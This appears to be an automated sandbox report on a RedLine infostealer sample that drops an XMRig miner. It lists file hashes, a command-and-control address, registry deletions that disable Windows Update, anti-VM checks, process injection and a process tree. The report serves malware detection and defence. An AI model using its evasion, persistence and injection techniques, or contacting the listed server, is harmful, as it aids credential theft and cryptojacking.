redline | feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb

Analysis

max time kernel
300s
max time network
261s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
24-10-2022 04:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe
Size

344KB
MD5

95230f05deb43f0adc402b128e331a9f
SHA1

2f732066b25f6c38b6d34d8cd5230cb0105aac9b
SHA256

feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb
SHA512

9fb99707ecb76268c6319b6f791fbb98b03e6fb86e26187c484df9c4cb2a255a7688aa5878b27c8c7ac2f31ddb44c36db2093002e0f01532862fb6753ebf662f
SSDEEP

6144:mq6LFGh9VxSaYmn9EqgJ/kQ4yuoohqXaySzv9oM6MAq:mnwnW4EqNyuooeaySzVos

Score

10^/10

redline xmrig 875784825 evasion infostealer miner spyware themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

875784825

79.137.192.6:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/97044-450-0x000000000041972E-mapping.dmp	family_redline
behavioral2/memory/97044-486-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

updater.exeMoUSO.exesetup.exesetup23.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MoUSO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup23.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/7084-1244-0x00007FF64D9F0000-0x00007FF64E1E4000-memory.dmp	xmrig
behavioral2/memory/7084-1287-0x00007FF64D9F0000-0x00007FF64E1E4000-memory.dmp	xmrig

Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

setup.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts setup.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 6 IoCs

Processes:

setup.exesetup23.exesetup2321.exeupdater.exewatchdog.exeMoUSO.exe

pid process

4880 setup.exe
2112 setup23.exe
3212 setup2321.exe
4036 updater.exe
2244 watchdog.exe
7156 MoUSO.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	setup.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
4880	setup.exe
2112	setup23.exe
3212	setup2321.exe
4036	updater.exe
2244	watchdog.exe
7156	MoUSO.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/7084-1244-0x00007FF64D9F0000-0x00007FF64E1E4000-memory.dmp	upx
behavioral2/memory/7084-1287-0x00007FF64D9F0000-0x00007FF64E1E4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup23.exeupdater.exeMoUSO.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup23.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup23.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup23.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Wine	setup23.exe
Key opened	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Wine	MoUSO.exe

Loads dropped DLL 3 IoCs

Processes:

MSBuild.exe

pid process

3488 MSBuild.exe
3488 MSBuild.exe
3488 MSBuild.exe

pid	process
3488	MSBuild.exe
3488	MSBuild.exe
3488	MSBuild.exe

Themida packer 16 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\setup.exe	themida
behavioral2/memory/4880-128-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
behavioral2/memory/4880-127-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
behavioral2/memory/4880-129-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
behavioral2/memory/4880-131-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
behavioral2/memory/4880-132-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
behavioral2/memory/4880-133-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
behavioral2/memory/4880-134-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
behavioral2/memory/4880-160-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\setup.exe	themida
behavioral2/memory/4880-393-0x00007FF64DE20000-0x00007FF64EB19000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/4036-410-0x00007FF736440000-0x00007FF737139000-memory.dmp	themida
behavioral2/memory/4036-531-0x00007FF736440000-0x00007FF737139000-memory.dmp	themida
behavioral2/memory/4036-1242-0x00007FF736440000-0x00007FF737139000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exesetup23.exeupdater.exeMoUSO.exe

pid process

4880 setup.exe
2112 setup23.exe
4036 updater.exe
7156 MoUSO.exe

pid	process
4880	setup.exe
2112	setup23.exe
4036	updater.exe
7156	MoUSO.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exesetup2321.exewatchdog.exeupdater.exe

description	pid	process	target process
PID 2840 set thread context of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 3212 set thread context of 3488	3212	setup2321.exe	MSBuild.exe
PID 2244 set thread context of 97044	2244	watchdog.exe	vbc.exe
PID 4036 set thread context of 6944	4036	updater.exe	conhost.exe
PID 4036 set thread context of 7084	4036	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

setup.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

664 sc.exe
2464 sc.exe
5784 sc.exe
5808 sc.exe
5824 sc.exe
4904 sc.exe
4344 sc.exe
1316 sc.exe
5692 sc.exe
5756 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4364 schtasks.exe

pid	process
664	sc.exe
2464	sc.exe
5784	sc.exe
5808	sc.exe
5824	sc.exe
4904	sc.exe
4344	sc.exe
1316	sc.exe
5692	sc.exe
5756	sc.exe

pid	process
4364	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup23.exepowershell.exesetup2321.exepowershell.exepowershell.exevbc.exepowershell.exepowershell.exeMoUSO.execonhost.exe

pid	process
2112	setup23.exe
2112	setup23.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3212	setup2321.exe
3212	setup2321.exe
1296	powershell.exe
1296	powershell.exe
1296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
97044	vbc.exe
97044	vbc.exe
1296	powershell.exe
1296	powershell.exe
1296	powershell.exe
5496	powershell.exe
5496	powershell.exe
5496	powershell.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7084	conhost.exe
7084	conhost.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe
7156	MoUSO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

632

pid	process
632

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exesetup2321.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	3212	setup2321.exe
Token: SeIncreaseQuotaPrivilege	3592	powershell.exe
Token: SeSecurityPrivilege	3592	powershell.exe
Token: SeTakeOwnershipPrivilege	3592	powershell.exe
Token: SeLoadDriverPrivilege	3592	powershell.exe
Token: SeSystemProfilePrivilege	3592	powershell.exe
Token: SeSystemtimePrivilege	3592	powershell.exe
Token: SeProfSingleProcessPrivilege	3592	powershell.exe
Token: SeIncBasePriorityPrivilege	3592	powershell.exe
Token: SeCreatePagefilePrivilege	3592	powershell.exe
Token: SeBackupPrivilege	3592	powershell.exe
Token: SeRestorePrivilege	3592	powershell.exe
Token: SeShutdownPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeSystemEnvironmentPrivilege	3592	powershell.exe
Token: SeRemoteShutdownPrivilege	3592	powershell.exe
Token: SeUndockPrivilege	3592	powershell.exe
Token: SeManageVolumePrivilege	3592	powershell.exe
Token: 33	3592	powershell.exe
Token: 34	3592	powershell.exe
Token: 35	3592	powershell.exe
Token: 36	3592	powershell.exe
Token: SeShutdownPrivilege	2200	powercfg.exe
Token: SeCreatePagefilePrivilege	2200	powercfg.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	4684	powercfg.exe
Token: SeCreatePagefilePrivilege	4684	powercfg.exe
Token: SeShutdownPrivilege	2132	powercfg.exe
Token: SeCreatePagefilePrivilege	2132	powercfg.exe
Token: SeShutdownPrivilege	2768	powercfg.exe
Token: SeCreatePagefilePrivilege	2768	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exeRegSvcs.exesetup.exesetup23.exesetup2321.execmd.execmd.exe

description	pid	process	target process
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2840 wrote to memory of 2868	2840	feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe	RegSvcs.exe
PID 2868 wrote to memory of 4880	2868	RegSvcs.exe	setup.exe
PID 2868 wrote to memory of 4880	2868	RegSvcs.exe	setup.exe
PID 2868 wrote to memory of 2112	2868	RegSvcs.exe	setup23.exe
PID 2868 wrote to memory of 2112	2868	RegSvcs.exe	setup23.exe
PID 2868 wrote to memory of 2112	2868	RegSvcs.exe	setup23.exe
PID 4880 wrote to memory of 3592	4880	setup.exe	powershell.exe
PID 4880 wrote to memory of 3592	4880	setup.exe	powershell.exe
PID 2868 wrote to memory of 3212	2868	RegSvcs.exe	setup2321.exe
PID 2868 wrote to memory of 3212	2868	RegSvcs.exe	setup2321.exe
PID 2112 wrote to memory of 4364	2112	setup23.exe	schtasks.exe
PID 2112 wrote to memory of 4364	2112	setup23.exe	schtasks.exe
PID 2112 wrote to memory of 4364	2112	setup23.exe	schtasks.exe
PID 3212 wrote to memory of 5040	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 5040	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 5040	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 3212 wrote to memory of 3488	3212	setup2321.exe	MSBuild.exe
PID 4880 wrote to memory of 708	4880	setup.exe	cmd.exe
PID 4880 wrote to memory of 708	4880	setup.exe	cmd.exe
PID 4880 wrote to memory of 404	4880	setup.exe	cmd.exe
PID 4880 wrote to memory of 404	4880	setup.exe	cmd.exe
PID 4880 wrote to memory of 1296	4880	setup.exe	powershell.exe
PID 4880 wrote to memory of 1296	4880	setup.exe	powershell.exe
PID 708 wrote to memory of 4904	708	cmd.exe	sc.exe
PID 708 wrote to memory of 4904	708	cmd.exe	sc.exe
PID 404 wrote to memory of 2200	404	cmd.exe	powercfg.exe
PID 404 wrote to memory of 2200	404	cmd.exe	powercfg.exe
PID 708 wrote to memory of 4344	708	cmd.exe	sc.exe
PID 708 wrote to memory of 4344	708	cmd.exe	sc.exe
PID 404 wrote to memory of 4684	404	cmd.exe	powercfg.exe
PID 404 wrote to memory of 4684	404	cmd.exe	powercfg.exe
PID 708 wrote to memory of 664	708	cmd.exe	sc.exe
PID 708 wrote to memory of 664	708	cmd.exe	sc.exe
PID 404 wrote to memory of 2132	404	cmd.exe	powercfg.exe
PID 404 wrote to memory of 2132	404	cmd.exe	powercfg.exe
PID 708 wrote to memory of 1316	708	cmd.exe	sc.exe
PID 708 wrote to memory of 1316	708	cmd.exe	sc.exe
PID 404 wrote to memory of 2768	404	cmd.exe	powercfg.exe
PID 404 wrote to memory of 2768	404	cmd.exe	powercfg.exe
PID 708 wrote to memory of 2464	708	cmd.exe	sc.exe
PID 708 wrote to memory of 2464	708	cmd.exe	sc.exe
PID 708 wrote to memory of 2512	708	cmd.exe	reg.exe
PID 708 wrote to memory of 2512	708	cmd.exe	reg.exe
PID 708 wrote to memory of 2832	708	cmd.exe	reg.exe
PID 708 wrote to memory of 2832	708	cmd.exe	reg.exe
PID 708 wrote to memory of 3844	708	cmd.exe	reg.exe
PID 708 wrote to memory of 3844	708	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe
"C:\Users\Admin\AppData\Local\Temp\feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Users\Admin\AppData\Local\Temp\setup.exe
